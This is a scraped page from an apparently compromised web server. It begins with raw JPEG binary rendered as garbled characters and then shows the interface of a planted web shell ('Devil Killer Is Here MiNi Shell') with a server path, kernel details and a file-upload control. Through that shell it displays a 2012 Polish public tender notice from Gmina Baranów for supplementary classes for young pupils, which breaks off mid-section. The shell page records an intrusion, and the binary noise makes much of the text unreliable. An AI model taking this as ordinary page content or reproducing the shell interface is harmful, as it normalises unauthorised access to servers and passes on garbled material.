JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120906/334988-N-2012.html

<p class="kh_header"><b>Baranów: ZAKUP USŁUG EDUKACYJNYCH W RAMACH REALIZACJI PROJEKTU INDYWIDUALIZACJA PROCESU NAUCZANIA I WYCHOWANIA UCZNIÓW KLAS I - III SZKOŁY PODSTAWOWEJ W BARANOWIE</b><br>
<b>Numer ogłoszenia: 334988 - 2012; data zamieszczenia: 06.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Baranów , ul. Rynek 14, 24-105 Baranów, woj. lubelskie, tel. 081 8834027, faks 081 8834041.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabaranow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP USŁUG EDUKACYJNYCH W RAMACH REALIZACJI PROJEKTU INDYWIDUALIZACJA PROCESU NAUCZANIA I WYCHOWANIA UCZNIÓW KLAS I - III SZKOŁY PODSTAWOWEJ W BARANOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usług edukacyjnych na potrzeby realizacji projektu systemowego projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III w Szkole Podstawowej w Baranowie, w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie: 9.1. Wyrównywanie szans edukacyjnych  i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Przedmiot zamówienia obejmuje przygotowanie, przeprowadzenie i dokumentowanie zajęć dodatkowych dla uczniów klas I - III Szkoły Podstawowej im. Powstańców Styczniowych w Baranowie w okresie roku szkolnego 2012/2013.
Opis wymaganych usług z podziałem na poszczególne zadania:
Przedmiot zamówienia obejmuje 5 zadań (części), które należy wykonać zgodnie z zapisami niniejszej Specyfikacji Istotnych Warunków Zamówienia, obowiązującymi przepisami prawa, w szczególności dotyczącymi systemu oświaty.
Zadanie Nr 1 - Zajęcia dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu w tym także zagrożone ryzykiem dysleksji - 120 godzin;
Zadanie   Nr 2 - Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 90 godzin;
Zadanie     Nr 3 -  Gimnastyka korekcyjna dla dzieci z wadami postawy - 180 godzin;
Zadanie     Nr 4 -  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 150 godzin;
Zadanie  Nr 5 -  Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych - 150 godzin.
Przyjmuje się, że 1 godzina zajęć rozwijających uzdolnienia i zajęć dydaktyczno- wyrównawczych  trwa 45 minut , natomiast 1 godzina zajęć specjalistycznych trwa 60 minut.
Zajęcia w ramach każdego z zadań należy wykonać  ilościach podanych w Wykazie zajęć - załącznik nr 8 do SIWZ, przy czym Zamawiający zastrzega sobie możliwość przesunięcia liczby godzin w latach 2012 i 2013.
Wykonawca zobowiązany jest do prowadzenia:
1)	zajęć edukacyjnych zgodnie z harmonogramem zajęć,
2)	dzienników zajęć, w tym list obecności uczniów na każdych zajęciach zawierającej datę i godziny prowadzonych zajęć, nazwiska, wiek, klasę ucznia, z podpisem prowadzącego zajęcia,
3)	obserwacji i pomiarów pedagogicznych, sporządzania dokumentacji, dokonywania oceny efektywności pomocy, w tym :przeprowadzenia systemu ankiet na początku, w trakcie i na zakończenie zajęć oraz wywiadów z uczestnikami poszczególnych zajęć,
4)	sporządzenia raz w miesiącu pisemnego sprawozdania obejmującego opis realizacji zajęć oraz pisemnego sprawozdania końcowego zawierającego efekty prowadzonych zajęć, przy czym sprawozdania miesięczne Wykonawca przedkłada Zamawiającemu na koniec każdego miesiąca, natomiast sprawozdanie końcowe Wykonawca przedłoży Zamawiającemu do dnia 15 lipca 2013 roku.
Wykonawca zobowiązany jest do współpracy z Koordynatorem Projektu oraz Dyrektorem Zespołu Szkolno - Przedszkolnego w Baranowie.
Wszelkie dokumenty dotyczące realizacji zajęć dodatkowych sporządzane przez Wykonawcę  muszą zawierać informacje o współfinansowaniu projektu z Europejskiego Funduszu Społecznego, logotyp Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej wraz z podpisem Europejski Fundusz Społeczny, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Wykonawca winien dysponować osobami posiadającymi stosowne kwalifikacje oraz doświadczenie zawodowe zapewniające świadczenie usług objętych umową na najwyższym poziomie, w sposób sumienny i staranny, według powszechnie obowiązujących standardów i norm w zakresie prowadzenia zajęć edukacyjnych dla uczniów.
Wykonawca przedstawi Zamawiającemu w terminie do 5 dni roboczych od dnia podpisania umowy harmonogram realizacji zajęć w każdym miesiącu kalendarzowym  na cały okres realizacji projektu  na warunkach określonych w Specyfikacji Istotnych Warunków Zamówienia. Opracowany harmonogram podlega zatwierdzeniu przez Dyrektora Zespołu Szkolno - Przedszkolnego w Baranowie, w którym odbywać się będą zajęcia. 
Zamawiający zastrzega sobie prawo wglądu do wszelkich dokumentów wykonawcy związanych z realizowanym projektem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zamawiający uzna za spełniony w przypadku, gdy wykonawca przedłoży oświadczenie potwierdzające spełnianie powyższego warunku - wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca przedłoży oświadczenie potwierdzające spełnianie powyższego warunku - wg załącznika Nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący, dysponowaniem odpowiednim potencjałem technicznym - zamawiający uzna za spełniony w przypadku, gdy wykonawca przedłoży oświadczenie potwierdzające spełnianie powyższego warunku - wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia -  zamawiający uzna za spełniony w przypadku, gdy wykonawca przedłoży następujące dokumenty:

- oświadczenie potwierdzające spełnianie powyższego warunku - wg załącznika Nr 2 do SIWZ;
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; wykonawca musi dysponować po 1 osobie posiadającej kwalifikacje i doświadczenie niezbędne do realizacji zajęć w ramach zadania lub zadań, na które Wykonawca złożył ofertę. Zamawiający nie dopuszcza możliwości prowadzenia zajęć w ramach jednego zadania przez kilku prowadzących.
Osoby prowadzące zajęcia muszą posiadać przygotowanie pedagogiczne oraz spełniać  warunki określające wykształcenie i doświadczenie w ramach każdego zadania od 1 do 5 opisane w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  dotyczący znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - zamawiający uzna za spełniony w przypadku, gdy wykonawca przedłoży oświadczenie potwierdzające spełnianie powyższego warunku - wg załącznika Nr 2 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do wystąpienia w imieniu wykonawcy w przypadku, gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej),
oświadczenie o zaangażowaniu każdej z osób uczestniczących w realizacji zamówienia  w realizację innych projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki jak również w ramach innych programów  NSRO - wg załącznika Nr 4 do SIWZ,
oświadczenie o zatrudnieniu każdej z  osób uczestniczących w realizacji zamówienia  w instytucji realizującej  Program Operacyjny Kapitał Ludzki - wg załącznika Nr 6 do SIWZ,
CV i deklarację uczestnictwa każdej z osób uczestniczących w realizacji zamówienia - wg załącznika Nr 7 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminabaranow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baranów, 24-105 Baranów, ul. Rynek 14, tel: 81 8834027, fax 81 8834041, e-mail: gmina@gminabaranow.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:00, miejsce: Urząd Gminy Baranów, 24-105 Baranów, ul. Rynek 14 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Indywidualizacja procesu nauczania i wychowania uczniów klas I - III w Szkole Podstawowej w Baranowie, realizowany w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie: 9.1. Wyrównywanie szans edukacyjnych  i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Zajęcia dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu w tym także zagrożone ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu w tym także zagrożone ryzykiem dysleksji - 120 godzin; OPIS: Program dla dzieci z trudnościami w nauce Radzę sobie coraz lepiej. Program obejmuje następujące treści w zakresie mówienia i pisania: wypowiedzi na podstawie wysłuchanych opowiadań, wierszy, poprawne pisanie liter, prawidłowe rozmieszczanie wyrazów w liniaturze, samodzielne układanie wyrazów i zdań, w zakresie czytania: globalne czytanie wyrazów i zdań, czytanie sylabami, pełne czytanie wyrazów i krótkich zdań, w zakresie gramatyczno - ortograficznym: poprawne dzielenie wyrazów na: głoski, litery, sylaby, rozpoznawanie samogłosek i spółgłosek, pisanie wyrazów ze spółgłoską miękką, zasady pisania zdań wielką literą.
Metody: słowne, oglądowe, praktycznego działania, problemowe.
Rekrutacja: do programu wybrane będą dzieci, które mają trudności w czytaniu i pisaniu. Udzielenie wsparcia tym uczniom pozwoli na lepsze przyswajanie wiedzy i zdobycie umiejętności polonistyczno- matematycznych oraz na wyrównywanie szans edukacyjnych.

Program zajęć dydaktyczno - wyrównawczych kierowany jest do uczniów, którzy mają kłopoty w czytaniu i pisaniu. Są to umiejętności i czynności skomplikowane. Niektórzy uczniowie mają kłopoty z przyswojeniem wiedzy i umiejętności, a także środowisko rodzinne nie sprzyja rozwojowi dziecka. Zatem wskazane są dodatkowe zajęcia, aby wyrównać szanse edukacyjne i zmobilizować dziecko do rozwoju. Wczesne wykrycie i wyrównanie zaburzeń może skutecznie przeszkodzić w ukształtowaniu się niewłaściwych postaw z powodu braku powodzenia w nauce. Dlatego też na zajęciach zastosowane będzie nauczanie zindywidualizowane. Prowadzący zajęcia kieruje swoją uwagę na poszczególnych uczniów i dostosowuje nauczanie do ich predyspozycji. W takim trybie każdy uczeń pracuje w swoim własnym rytmie i na odpowiednim poziomie. Na zajęciach zastosowane będą karty dydaktyczne, które umożliwią każdemu uczniowi przerabianie kolejnych partii materiału w swoim własnym tempie. 
Metody aktywizujące:  problemowa, eksponująca, praktyczna, pogadanka, dyskusja, pokaz, obserwacja, eksperymenty, ćwiczenia, gry i zabawy, karty dydaktyczne.
Celem ww. zajęć jest poszerzenie oferty edukacyjnej dla klas kształcenia zintegrowanego oraz rozwój indywidualnych zdolności- indywidualizacja nauczania, zainteresowań i potrzeb oraz doskonalenie umiejętności czytania ze zrozumieniem, nauka ortografii i gramatyki, usprawnianie grafomotoryczne i manualne, ćwiczenia doskonalące pamięć wzrokową, słuchową i ruchową., rozwijanie umiejętności tworzenia zdań, tekstów i  rozumienia sensu wypowiedzi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie   Nr 2 - Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 90 godzin; OPIS: W procesie uczenia się dziecko często napotyka na różne trudności, wśród nich występują niepowodzenia w uczeniu się matematyki. Przyczyny tych niepowodzeń są różnorakie. Matematyka jest przedmiotem trudnym i nie da się jej opanować bez pewnego wysiłku intelektualnego ze strony ucznia. 
Cel zajęć: kształtowanie pojęcia liczby naturalnej oraz rozumienia czterech podstawowych działań matematycznych, rozwijanie umiejętności logicznego myślenia i wyobraźni przestrzennej, nauka wykonywania zadań poprzez mierzenie, ważenie, rozpoznawanie i nazywanie figur geometrycznych. 
Program dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych Radzę sobie coraz lepiej
Program obejmuje następujące treści : pojęcie liczby, działania na liczbach,
określanie położenia przedmiotów w przestrzeni, wyznaczanie kierunków, porządkowanie przedmiotów wg wielkości, odczytywanie pełnych godzin na zegarze, kalendarz: dni tygodnia,
obliczenia pieniężne, rozróżnianie i nazywanie figur geometrycznych, zbiory: klasyfikowanie, działanie na zbiorach, proste zadania z treścią.
Metody: słowne, oglądowe, praktycznego działania, problemowe.
Rekrutacja:
Do programu wybrane będą dzieci, które mają trudności w liczeniu. Udzielenie wsparcia tym uczniom pozwoli na lepsze przyswajanie wiedzy i zdobycie umiejętności polonistyczno- matematycznych oraz na wyrównywanie szans edukacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie     Nr 3 -  Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gimnastyka korekcyjna dla dzieci z wadami postawy - 180 godzin; OPIS: Metody stosowane na zajęciach w zależności od rodzaju zadań:
-	metoda naśladowcza ścisła,
-	metoda zadaniowa,
-	metoda programowego uczenia się,
-	metoda zabawowo - naśladowcza,
-	metoda zabawowo - klasyczna,
-	metoda bezpośredniej celowości ruchu,
-	metoda opowieści ruchowej.
Zadania: 
1)	Ocena postawy dziecka
2)	Badania i pomiary uzupełniające.
3)	Uświadomienie dziecku jego defektu i potrzeby ćwiczeń, wyeliminowanie kompleksów.
